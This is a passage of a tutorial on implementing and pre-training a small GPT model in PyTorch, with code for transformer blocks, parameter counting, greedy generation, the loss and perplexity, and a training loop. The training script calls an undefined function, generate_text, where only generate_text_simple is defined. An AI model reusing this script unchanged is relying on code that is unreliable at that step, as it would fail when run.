        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
        # x shape: (batch_size, seq_len, emb_dim)

        # Shortcut connection for attention block
        shortcut = x               # shape: (batch_size, seq_len, emb_dim)
        x = self.norm1(x)          # shape remains (batch_size, seq_len, emb_dim)
        x = self.att(x)            # shape: (batch_size, seq_len, emb_dim)
        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
        x = x + shortcut           # shape: (batch_size, seq_len, emb_dim)

        # Shortcut connection for feedforward block
        shortcut = x               # shape: (batch_size, seq_len, emb_dim)
        x = self.norm2(x)          # shape remains (batch_size, seq_len, emb_dim)
        x = self.ff(x)             # shape: (batch_size, seq_len, emb_dim)
        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
        x = x + shortcut           # shape: (batch_size, seq_len, emb_dim)

        return x  # Output shape: (batch_size, seq_len, emb_dim)
```
#### **Purpose and Functionality**

- **Composition of Layers:** Combines multi-head attention, feedforward network, layer normalization, and residual connections.
- **Layer Normalization:** Applied before the attention and feedforward layers for stable training.
- **Residual Connections (Shortcuts):** Add the input of a layer to its output to improve gradient flow and enable training of deep networks.
- **Dropout:** Applied after the attention and feedforward layers for regularization.

#### **Step-by-Step Functionality**

1. **First Residual Path (Self-Attention):**
   - **Input (`shortcut`):** Save the original input for the residual connection.
   - **Layer Norm (`norm1`):** Normalize the input.
   - **Multi-Head Attention (`att`):** Apply self-attention.
   - **Dropout (`drop_shortcut`):** Apply dropout for regularization.
   - **Add Residual (`x + shortcut`):** Combine with the original input.
2. **Second Residual Path (FeedForward):**
   - **Input (`shortcut`):** Save the updated input for the next residual connection.
   - **Layer Norm (`norm2`):** Normalize the input.
   - **FeedForward Network (`ff`):** Apply the feedforward transformation.
   - **Dropout (`drop_shortcut`):** Apply dropout.
   - **Add Residual (`x + shortcut`):** Combine with the input of the first residual path.

> [!NOTE]
> The transformer block groups all the networks together and applies some **normalization** and **dropouts** to improve the training stability and results.\
> Note how dropouts are applied after the use of each network while normalization is applied before.
>
> Moreover, it also uses shortcuts, which consist of **adding the output of a network to its input**. This helps to prevent the vanishing gradient problem by making sure that initial layers contribute "as much" as the last ones.

### **GPTModel**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        # shape: (vocab_size, emb_dim)

        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        # shape: (context_length, emb_dim)

        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
        )
        # Stack of TransformerBlocks

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
        # shape: (emb_dim, vocab_size)

    def forward(self, in_idx):
        # in_idx shape: (batch_size, seq_len)
        batch_size, seq_len = in_idx.shape

        # Token embeddings
        tok_embeds = self.tok_emb(in_idx)
        # shape: (batch_size, seq_len, emb_dim)

        # Positional embeddings
        pos_indices = torch.arange(seq_len, device=in_idx.device)
        # shape: (seq_len,)
        pos_embeds = self.pos_emb(pos_indices)
        # shape: (seq_len, emb_dim)

        # Add token and positional embeddings
        x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
        # x shape: (batch_size, seq_len, emb_dim)

        x = self.drop_emb(x)  # Dropout applied
        # x shape remains: (batch_size, seq_len, emb_dim)

        x = self.trf_blocks(x)  # Pass through Transformer blocks
        # x shape remains: (batch_size, seq_len, emb_dim)

        x = self.final_norm(x)  # Final LayerNorm
        # x shape remains: (batch_size, seq_len, emb_dim)

        logits = self.out_head(x)  # Project to vocabulary size
        # logits shape: (batch_size, seq_len, vocab_size)

        return logits  # Output shape: (batch_size, seq_len, vocab_size)
```
#### **Purpose and Functionality**

- **Embedding Layers:**
  - **Token Embeddings (`tok_emb`):** Converts token indices into embeddings. As a reminder, these are the weights given to each dimension of each token in the vocabulary.
  - **Positional Embeddings (`pos_emb`):** Adds positional information to the embeddings to capture the order of tokens. As a reminder, these are the weights given to each token according to its position in the text.
- **Dropout (`drop_emb`):** Applied to the embeddings for regularization.
- **Transformer Blocks (`trf_blocks`):** A stack of `n_layers` transformer blocks to process the embeddings.
- **Final Normalization (`final_norm`):** Layer normalization before the output layer.
- **Output Layer (`out_head`):** Projects the final hidden states to the vocabulary size to produce the logits for prediction.

> [!NOTE]
> The goal of this class is to use all the other mentioned networks to **predict the next token in a sequence**, which is fundamental for tasks like text generation.
>
> Note how it will **use as many transformer blocks as indicated** and that each transformer block uses one multi-head attention net, one feedforward net and several normalizations. So if 12 transformer blocks are used, multiply this by 12.
>
> Moreover, a **normalization** layer is added **before** the **output** and a final linear layer is applied at the end to get the results with the proper dimensions. Note how each final vector has the size of the used vocabulary. This is because it's trying to get a probability per possible token inside the vocabulary.

## Number of Parameters to Train

Having the GPT structure defined, it's possible to find out the number of parameters to train:
```python
GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-Key-Value bias
}

model = GPTModel(GPT_CONFIG_124M)
total_params = sum(p.numel() for p in model.parameters())
print(f"Total number of parameters: {total_params:,}")
# Total number of parameters: 163,009,536
```
### **Step-by-Step Calculation**

#### **1. Embedding Layers: Token Embedding & Position Embedding**

- **Layer:** `nn.Embedding(vocab_size, emb_dim)`
- **Parameters:** `vocab_size * emb_dim`
```python
token_embedding_params = 50257 * 768 = 38,597,376
```
- **Layer:** `nn.Embedding(context_length, emb_dim)`
- **Parameters:** `context_length * emb_dim`
```python
position_embedding_params = 1024 * 768 = 786,432
```
**Total Embedding Parameters**
```python
embedding_params = token_embedding_params + position_embedding_params
embedding_params = 38,597,376 + 786,432 = 39,383,808
```
#### **2. Transformer Blocks**

There are 12 transformer blocks, so we will calculate the parameters for one block and then multiply by 12.

**Parameters per Transformer Block**

**a. Multi-Head Attention**

- **Components:**
  - **Query Linear Layer (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Key Linear Layer (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Value Linear Layer (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Output Projection (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
- **Calculations:**

  - **Each of `W_query`, `W_key`, `W_value`:**

    ```python
    qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
    ```

    Since there are three such layers:

    ```python
    total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
    ```

  - **Output Projection (`out_proj`):**

    ```python
    out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
    ```

  - **Total Multi-Head Attention Parameters:**

    ```python
    mha_params = total_qkv_params + out_proj_params
    mha_params = 1,769,472 + 590,592 = 2,360,064
    ```

**b. FeedForward Network**

- **Components:**
  - **First Linear Layer:** `nn.Linear(emb_dim, 4 * emb_dim)`
  - **Second Linear Layer:** `nn.Linear(4 * emb_dim, emb_dim)`
- **Calculations:**

  - **First Linear Layer:**

    ```python
    ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
    ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
    ```

  - **Second Linear Layer:**

    ```python
    ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
    ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
    ```

  - **Total FeedForward Parameters:**

    ```python
    ff_params = ff_first_layer_params + ff_second_layer_params
    ff_params = 2,362,368 + 2,360,064 = 4,722,432
    ```

**c. Layer Normalizations**

- **Components:**
  - Two `LayerNorm` instances per block.
  - Each `LayerNorm` has `2 * emb_dim` parameters (scale and shift).
- **Calculations:**

  ```python
  layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * (2 * 768) = 3,072
  ```

**d. Total Parameters per Transformer Block**
```python
params_per_block = mha_params + ff_params + layer_norm_params_per_block
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
```
**Total Parameters for All Transformer Blocks**
```python
total_transformer_blocks_params = params_per_block * n_layers
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
```
#### **3. Final Layers**

**a. Final Layer Normalization**

- **Parameters:** `2 * emb_dim` (scale and shift)
```python
final_layer_norm_params = 2 * 768 = 1,536
```
**b. Output Projection Layer (`out_head`)**

- **Layer:** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **Parameters:** `emb_dim * vocab_size`
```python
output_projection_params = 768 * 50257 = 38,597,376
```
#### **4. Summing Up All Parameters**
```python
total_params = (
    embedding_params +
    total_transformer_blocks_params +
    final_layer_norm_params +
    output_projection_params
)
total_params = (
    39,383,808 +
    85,026,816 +
    1,536 +
    38,597,376
)
total_params = 163,009,536
```
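
As a quick cross-check (a sketch assuming the `model` instantiated above), the same total can be obtained programmatically; the well-known "124M" figure of GPT-2 appears once the output head is excluded, because GPT-2 ties it to the token-embedding matrix:
```python
total_params = sum(p.numel() for p in model.parameters())
print(f"{total_params:,}")  # 163,009,536

# GPT-2 reuses the token-embedding matrix as the output head (weight tying),
# so those 38,597,376 parameters are only counted once:
total_params_gpt2 = total_params - sum(p.numel() for p in model.out_head.parameters())
print(f"{total_params_gpt2:,}")  # 124,412,160
```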

## Generate Text

Having a model that predicts the next token like the one from before, it's just needed to take the last token values from the output (as they will be the ones of the predicted token), which will be **a value per entry in the vocabulary**, then use the `softmax` function to normalize the dimensions into probabilities that sum 1, and then get the index of the biggest entry, which will be the index of the word inside the vocabulary.

Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
```python
def generate_text_simple(model, idx, max_new_tokens, context_size):
    # idx is (batch, n_tokens) array of indices in the current context
    for _ in range(max_new_tokens):

        # Crop current context if it exceeds the supported context size
        # E.g., if LLM supports only 5 tokens, and the context size is 10
        # then only the last 5 tokens are used as context
        idx_cond = idx[:, -context_size:]

        # Get the predictions
        with torch.no_grad():
            logits = model(idx_cond)

        # Focus only on the last time step
        # (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
        logits = logits[:, -1, :]

        # Apply softmax to get probabilities
        probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)

        # Get the idx of the vocab entry with the highest probability value
        idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)

        # Append sampled index to the running sequence
        idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)

    return idx


start_context = "Hello, I am"

encoded = tokenizer.encode(start_context)
print("encoded:", encoded)

encoded_tensor = torch.tensor(encoded).unsqueeze(0)
print("encoded_tensor.shape:", encoded_tensor.shape)

model.eval()  # disable dropout

out = generate_text_simple(
    model=model,
    idx=encoded_tensor,
    max_new_tokens=6,
    context_size=GPT_CONFIG_124M["context_length"]
)

print("Output:", out)
print("Output length:", len(out[0]))
```
## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

# 6. Pre-training & Loading models

## Text Generation

In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.

As we already predicted some tokens in the previous examples, it's possible to reuse that function for this purpose.

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.

## Text Evaluation

In order to perform a correct training it's needed to check the predictions obtained against the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.

In order to maximize the probability of the correct token, the weights of the model must be modified so that this probability is maximised. The weights are updated via **backpropagation**. This requires a **loss function to minimize**. In this case, the function will be the **difference between the performed prediction and the desired one**.

However, instead of working with the raw predictions, it works with their natural logarithm. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, the first 4 of them being the last tokens of the input and the fifth the newly predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input, the model doesn't know this), with 5 expected tokens and therefore 5 probabilities to maximize.

Therefore, after taking the natural logarithm of each prediction, the **average** is calculated, the **minus symbol removed** (this is called the _cross entropy loss_) and that's the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:

<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
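
As a minimal sketch (with hypothetical toy logits, not the book's data), the same computation can be checked against PyTorch's built-in `cross_entropy`:
```python
import torch
import torch.nn.functional as F

# Toy example: 2 positions over a 5-token vocabulary
logits = torch.tensor([[2.0, 0.5, 0.1, -1.0, 0.0],
                       [0.2, 1.5, -0.3, 0.0, 0.7]])
targets = torch.tensor([0, 1])  # expected token ids

# Manual computation: natural log-probability of each expected token,
# averaged, with the sign flipped (cross entropy loss)
log_probs = torch.log_softmax(logits, dim=-1)
manual = -log_probs[torch.arange(2), targets].mean()

print(manual, F.cross_entropy(logits, targets))  # both values match
```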

Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
For example, a perplexity value of 48,725 means that, when it needs to predict a token, the model is unsure about which among 48,725 tokens in the vocabulary is the right one.
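
Since perplexity is simply the exponential of the cross-entropy loss, it can be computed directly from it (a sketch; the 48,725 value is the example figure from above):
```python
import torch

# Perplexity = exp(cross-entropy loss)
loss = torch.tensor(10.7939)  # example cross-entropy value
print(torch.exp(loss))        # ≈ 48,725: as unsure as picking among ~48,725 tokens
```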

## Pre-Train Example

This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb), sometimes slightly modified.

<details>

<summary>Previous code used here but already explained in previous sections</summary>

```python
"""
This is code explained before, so it won't be explained again
"""

import tiktoken
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader


class GPTDatasetV1(Dataset):
    def __init__(self, txt, tokenizer, max_length, stride):
        self.input_ids = []
        self.target_ids = []

        # Tokenize the entire text
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})

        # Use a sliding window to chunk the book into overlapping sequences of max_length
        for i in range(0, len(token_ids) - max_length, stride):
            input_chunk = token_ids[i:i + max_length]
            target_chunk = token_ids[i + 1: i + max_length + 1]
            self.input_ids.append(torch.tensor(input_chunk))
            self.target_ids.append(torch.tensor(target_chunk))

    def __len__(self):
        return len(self.input_ids)

    def __getitem__(self, idx):
        return self.input_ids[idx], self.target_ids[idx]


def create_dataloader_v1(txt, batch_size=4, max_length=256,
                         stride=128, shuffle=True, drop_last=True, num_workers=0):
    # Initialize the tokenizer
    tokenizer = tiktoken.get_encoding("gpt2")

    # Create dataset
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)

    # Create dataloader
    dataloader = DataLoader(
        dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)

    return dataloader


class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert d_out % num_heads == 0, "d_out must be divisible by n_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))

    def forward(self, x):
        b, num_tokens, d_in = x.shape

        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.reshape(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec)  # optional projection

        return context_vec


class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift


class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))


class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        return self.layers(x)


class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"])
        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
        # Shortcut connection for attention block
        shortcut = x
        x = self.norm1(x)
        x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        # Shortcut connection for feed-forward block
        shortcut = x
        x = self.norm2(x)
        x = self.ff(x)
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        return x


class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)

    def forward(self, in_idx):
        batch_size, seq_len = in_idx.shape
        tok_embeds = self.tok_emb(in_idx)
        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_emb(x)
        x = self.trf_blocks(x)
        x = self.final_norm(x)
        logits = self.out_head(x)
        return logits
```

</details>
|
||||
|
||||
```python
|
||||
# Download contents to train the data with
import os
import urllib.request
import tiktoken  # needed below for the GPT-2 tokenizer
import torch

file_path = "the-verdict.txt"
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"

if not os.path.exists(file_path):
    with urllib.request.urlopen(url) as response:
        text_data = response.read().decode('utf-8')
    with open(file_path, "w", encoding="utf-8") as file:
        file.write(text_data)
else:
    with open(file_path, "r", encoding="utf-8") as file:
        text_data = file.read()

total_characters = len(text_data)
tokenizer = tiktoken.get_encoding("gpt2")
total_tokens = len(tokenizer.encode(text_data))

print("Data downloaded")
print("Characters:", total_characters)
print("Tokens:", total_tokens)

# Model initialization
GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 256,  # Shortened context length (orig: 1024)
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-key-value bias
}

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.eval()
print("Model initialized")


# Functions to transform from text to token ids and vice versa
def text_to_token_ids(text, tokenizer):
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
    return encoded_tensor

def token_ids_to_text(token_ids, tokenizer):
    flat = token_ids.squeeze(0) # remove batch dimension
    return tokenizer.decode(flat.tolist())


# Define loss functions
def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
    return loss


def calc_loss_loader(data_loader, model, device, num_batches=None):
    total_loss = 0.
    if len(data_loader) == 0:
        return float("nan")
    elif num_batches is None:
        num_batches = len(data_loader)
    else:
        # Reduce the number of batches to match the total number of batches in the data loader
        # if num_batches exceeds the number of batches in the data loader
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            total_loss += loss.item()
        else:
            break
    return total_loss / num_batches


# Apply the train/validation ratio and create the dataloaders
train_ratio = 0.90
split_idx = int(train_ratio * len(text_data))
train_data = text_data[:split_idx]
val_data = text_data[split_idx:]

torch.manual_seed(123)

train_loader = create_dataloader_v1(
    train_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=True,
    shuffle=True,
    num_workers=0
)

val_loader = create_dataloader_v1(
    val_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=False,
    shuffle=False,
    num_workers=0
)


# Sanity checks
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the training loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "increase the `training_ratio`")

if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the validation loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "decrease the `training_ratio`")

print("Train loader:")
for x, y in train_loader:
    print(x.shape, y.shape)

print("\nValidation loader:")
for x, y in val_loader:
    print(x.shape, y.shape)

train_tokens = 0
for input_batch, target_batch in train_loader:
    train_tokens += input_batch.numel()

val_tokens = 0
for input_batch, target_batch in val_loader:
    val_tokens += input_batch.numel()

print("Training tokens:", train_tokens)
print("Validation tokens:", val_tokens)
print("All tokens:", train_tokens + val_tokens)


# Indicate the device to use
if torch.cuda.is_available():
    device = torch.device("cuda")
elif torch.backends.mps.is_available():
    device = torch.device("mps")
else:
    device = torch.device("cpu")

print(f"Using {device} device.")

model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes


# Pre-calculate losses without starting training yet
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader

with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
    train_loss = calc_loss_loader(train_loader, model, device)
    val_loss = calc_loss_loader(val_loader, model, device)

print("Training loss:", train_loss)
print("Validation loss:", val_loss)


# Functions to train the model
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
                       eval_freq, eval_iter, start_context, tokenizer):
    # Initialize lists to track losses and tokens seen
    train_losses, val_losses, track_tokens_seen = [], [], []
    tokens_seen, global_step = 0, -1

    # Main training loop
    for epoch in range(num_epochs):
        model.train()  # Set model to training mode

        for input_batch, target_batch in train_loader:
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            loss.backward() # Calculate loss gradients
            optimizer.step() # Update model weights using loss gradients
            tokens_seen += input_batch.numel()
            global_step += 1

            # Optional evaluation step
            if global_step % eval_freq == 0:
                train_loss, val_loss = evaluate_model(
                    model, train_loader, val_loader, device, eval_iter)
                train_losses.append(train_loss)
                val_losses.append(val_loss)
                track_tokens_seen.append(tokens_seen)
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")

        # Print a sample text after each epoch
        generate_and_print_sample(
            model, tokenizer, device, start_context
        )

    return train_losses, val_losses, track_tokens_seen


def evaluate_model(model, train_loader, val_loader, device, eval_iter):
    model.eval()
    with torch.no_grad():
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
    model.train()
    return train_loss, val_loss


def generate_and_print_sample(model, tokenizer, device, start_context):
    model.eval()
    context_size = model.pos_emb.weight.shape[0]
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
    with torch.no_grad():
        token_ids = generate_text(
            model=model, idx=encoded,
            max_new_tokens=50, context_size=context_size
        )
    decoded_text = token_ids_to_text(token_ids, tokenizer)
    print(decoded_text.replace("\n", " "))  # Compact print format
    model.train()


# Start training!
import time
start_time = time.time()

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.to(device)
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)

num_epochs = 10
train_losses, val_losses, tokens_seen = train_model_simple(
    model, train_loader, val_loader, optimizer, device,
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
    start_context="Every effort moves you", tokenizer=tokenizer
)

end_time = time.time()
execution_time_minutes = (end_time - start_time) / 60
print(f"Training completed in {execution_time_minutes:.2f} minutes.")


# Show graphics with the training process
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import math

def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
    fig, ax1 = plt.subplots(figsize=(5, 3))
    ax1.plot(epochs_seen, train_losses, label="Training loss")
    ax1.plot(
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
    )
    ax1.set_xlabel("Epochs")
    ax1.set_ylabel("Loss")
    ax1.legend(loc="upper right")
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax2 = ax1.twiny()
    ax2.plot(tokens_seen, train_losses, alpha=0)  # Invisible plot to align the token axis
    ax2.set_xlabel("Tokens seen")
    fig.tight_layout()
    plt.show()

# Compute perplexity from the loss values
train_ppls = [math.exp(loss) for loss in train_losses]
val_ppls = [math.exp(loss) for loss in val_losses]

# Plot perplexity over tokens seen
plt.figure()
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
plt.xlabel('Tokens Seen')
plt.ylabel('Perplexity')
plt.title('Perplexity over Training')
plt.legend()
plt.show()

epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)


torch.save({
    "model_state_dict": model.state_dict(),
    "optimizer_state_dict": optimizer.state_dict(),
    },
    "/tmp/model_and_optimizer.pth"
)
```

Let's see an explanation step by step.

### Functions to transform text <--> ids

These are some simple functions that can be used to transform texts from the vocabulary into ids and back. This is needed at the beginning of the handling of the text and at the end of the predictions:
```python
# Functions to transform from text to token ids and vice versa
def text_to_token_ids(text, tokenizer):
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
    return encoded_tensor

def token_ids_to_text(token_ids, tokenizer):
    flat = token_ids.squeeze(0) # remove batch dimension
